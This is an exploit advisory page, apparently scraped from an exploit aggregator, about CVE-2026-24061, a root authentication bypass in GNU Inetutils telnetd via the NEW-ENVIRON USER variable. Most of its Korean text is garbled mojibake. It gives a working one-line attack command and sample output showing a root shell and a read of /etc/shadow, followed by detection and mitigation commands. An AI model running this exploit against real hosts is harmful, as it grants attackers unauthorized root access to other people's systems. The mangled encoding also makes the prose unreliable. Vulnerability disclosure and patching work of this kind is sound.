## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XBLACKASH-CVE-2026-24061
# π¨ CVE-2026-24061 β βTelneTDβ

**GNU Inetutils telnetdμ μΉλͺ
μ μΈ μ격 μΈμ¦ μ°ν**
2015λ
μ μ λ Ήμ΄ λμμ μ¬μ ν ν
λ·μ μ€ν μ€μΈ λͺ¨λ κ²μ μ₯μ
ν©λλ€.
   
**μΈμ¦ μ λ‘. νκ²½ λ³μ νλ. μ¦μ λ£¨νΈ μ.**
* * *
## β οΈ κ°μ
**CVE-2026-24061** μ **GNU Inetutils telnetd β€ 2.7** μμ λ°κ²¬λ **μ¬κ°ν μ격 κΆν μμΉ** μ·¨μ½μ μ
λλ€.
μΈμ¦λμ§ μμ μ격 곡격μλ Telnet NEW-ENVIRON μ΅μ
μ ν΅ν΄ `USER` νκ²½ λ³μλ₯Ό `"-f root"`λ‘ μ€μ ν©λλ€.
telnetdλ μ΄λ₯Ό **μ ννμ§ μκ³ ** `/bin/login`μ λ°λ‘ μ λ¬ν©λλ€ β loginμ `-f root`λ₯Ό λ³΄κ³ β λͺ¨λ μΈμ¦μ 건λλ°κ³ β 곡격μλ₯Ό **λ£¨νΈ μ** μ λΉ λ¨λ¦½λλ€.
μνν μ½λλ **κ±°μ 11λ
**(μ½ 2015λ
μ΄ν) λμ μ‘°μ©ν μ½λ νΈλ¦¬μ λ¨μ μμμ΅λλ€.
> βνλμ νκ²½ λ³μ. λΉλ°λ²νΈ μμ. μμ ν 루νΈ. 2026λ
μ μ€μ κ²μ νμν©λλ€.β
* * *
## π₯ μ¬κ°λ λ° μν₯
* **CVSS v3.1 κΈ°λ³Έ μ μ** : **9.8 / μ¬κ°(Critical)**
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
* **곡격 κ²½λ‘** : λ€νΈμν¬ (TCP/23)
* **νμ κΆν** : μμ
* **μ¬μ©μ μνΈμμ©** : μμ
* **μ΅μ€νλ‘μ μ±μλ** : μ¬μν¨(λͺ¨λ ν
λ· ν΄λΌμ΄μΈνΈμμ ν μ€ λͺ
λ Ήμ΄λ‘ μλ)
**2026λ
3μμ νμ€** :
* 1μ λ§λΆν° λκ·λͺ¨ μ€μΊλ λ° μ΅μ€νλ‘μ κ΄μ°°λ¨
* λ κ±°μ μλ² λλ μ₯μΉ, OT μ₯λΉ, μνμ§ ν
μ€νΈ μλ²κ° μ¬μ ν κ΄λ²μνκ² λ
ΈμΆλ¨
* μ 체 μμ€ν
μμ: μ격 μ¦λͺ
, μ§μμ±, λμ¬μ¨μ΄ μ§μ
μ
* * *
## π΅οΈ λ°κ²¬
* 2026λ
1μ μ€μ GNU μ μ§ κ΄λ¦¬μμκ² λΉκ³΅κ° 보κ³
* 2026λ
1μ λ§ oss-securityλ₯Ό ν΅ν΄ κ³΅κ° κ³΅κ°
* GNU Inetutils β₯ 2.8μμ μμ λ¨(κ³΅κ° μ§ν μΆμ)
* * *
## π¬ κΈ°μ μ¬μΈ΅ λΆμ
telnetdκ° λ€μμ ν¬ν¨νλ NEW-ENVIRON μ΅μ
μ μμ νλ©΄:
root@kitploit:~
USER=-f root
ν΄λΉ κ°μ `/bin/login`μ μ λ¬λλ argvμ **μ§μ ** μΆκ°ν©λλ€:
root@kitploit:~
execve("/bin/login", ["login", "-f", "root", ...], ...)
login λ°μ΄λ리λ `-f root`λ₯Ό λ€μκ³Ό κ°μ΄ ν΄μν©λλ€:
βμ΄ μ¬μ©μλ μ΄λ―Έ rootλ‘ μΈμ¦λ¨ β λΉλ°λ²νΈ νμΈ λΆνμ.β
β 곡격μλ **#** ν둬ννΈλ₯Ό μ»μ΅λλ€. κ²μ μ€λ².
**μΉλͺ
μ μΈ μ€κ³ κ²°μ ** : `-R` / νκ²½ λ³μ μ λ¬μ κΆνμ΄ μλ μ¬μ©μλ‘ μ νλμ§ μμμ΅λλ€.
* * *
## π
νμλΌμΈ
* * *
## π₯οΈ μν₯λ°λ μμ€ν
**μ·¨μ½ν λ²μ ** : GNU Inetutils telnetd **1.9.3 β 2.7**
**2026λ
μΌλ°μ μΈ λμ** :
* λ κ±°μ μ°μ
μ© μ»¨νΈλ‘€λ¬ λ° HMI
* μ€λλ λΌμ°ν°, μ€μμΉ, νλ¦°ν°
* Debian κΈ°λ° μλ² λλ μ΄νλΌμ΄μΈμ€
* μνμ§ κ°λ°/ν
μ€νΈ VM λ° μ»¨ν
μ΄λ
* μ¬μ ν TCP/23μ λ
ΈμΆνλ OT κ²μ΄νΈμ¨μ΄
**μμ ν μμ€ν
** :
* busybox telnetdλ₯Ό μ€ννλ μμ€ν
* Inetutils β₯ 2.8
* ν
λ·μ΄ μμ ν λΉνμ±ν/λ°©νλ²½ μ°¨λ¨λ¨
* * *
## π₯ μ΅μ€νλ‘μ μ€ν
**ν μ€ λͺ
λ Ήμ΄ (telnet ν΄λΌμ΄μΈνΈκ° μλ λͺ¨λ Linux/macOS)** :
root@kitploit:~
USER="-f root" telnet -a 192.168.1.50
**μΌλ°μ μΈ μΆλ ₯** :

root@kitploit:~
βββ(attackerγΏkali)-[~]
ββ$ USER="-f root" telnet -a 192.168.1.50
Trying 192.168.1.50...
Connected to 192.168.1.50.
Escape character is '^]'.
Debian GNU/Linux 12 telnetd
root@legacy-box:~# whoami
root
root@legacy-box:~# id
uid=0(root) gid=0(root) groups=0(root)
root@legacy-box:~# cat /etc/shadow
...
μν° ν€ ν λ² λλ₯΄λ©΄ β μ 체 λ£¨νΈ μ‘μΈμ€.
* * *
## π‘οΈ νμΈ λ° μ‘°μΉ (2026λ
3μ)
### 1\. μ·¨μ½ν μλΉμ€ νμ§
root@kitploit:~
telnet localhost 23 # inetutils λ°°λ νμΈ
inetutils-telnetd --version # β€ 2.7μ΄λ©΄ μ·¨μ½
### 2\. μλΉμ€ μ€λ¨ (κ°μ₯ κΆμ₯)
root@kitploit:~
systemctl disable --now inetutils-inetd # λλ telnet.socket
pkill telnetd && chmod -x /usr/sbin/telnetd
### 3\. μ
λ°μ΄νΈ (ν
λ·μ κΌ μ μ§ν΄μΌ νλ κ²½μ°λ§ β λλ¬Έ κ²½μ°)
root@kitploit:~
sudo apt update && sudo apt install --reinstall inetutils-telnetd # β β₯2.8
### 4\. λ°©νλ²½ (μ΄μ€ μμ μ₯μΉ)
root@kitploit:~
iptables -A INPUT -p tcp --dport 23 -j DROP
ufw deny 23/tcp
* * *
## π νμ¬ μν β 2026λ
3μ
* ν¨μΉλμ§ μμ λ κ±°μ μ₯μΉμ λν μ΅μ€νλ‘μ μ§μ
* ν
λ· μ¬μ©λ₯ μ μ¬μ μ΅μ β κ·Έλ¬λ μ‘΄μ¬ν κ²½μ° μ¬μ ν μΉλͺ
μ
* μνκ³ κ΅ν: **λ κ±°μ νλ‘ν μ½μ μ§λ’°λ°**
* * *
## π λμ μκ²¨μ§ κ΅ν
* 11λ
λ λ²κ·Έκ° μ¬μ ν "μ£½μ" μ½λμ μ¨μ΄ μμ
* λ£¨νΈ μμ± λ°μ΄λ리μ μ νλμ§ μμ μ¬μ©μ μ
λ ₯μ μ λ μ λ¬νμ§ λ§ κ²
* μΈμ μ½μ
β 루νΈλ μμν¨
* **ν
λ·μ 2010λ
μ μ¬λΌμ‘μ΄μΌ νλ€. 2026λ
μ μμ λΌ.**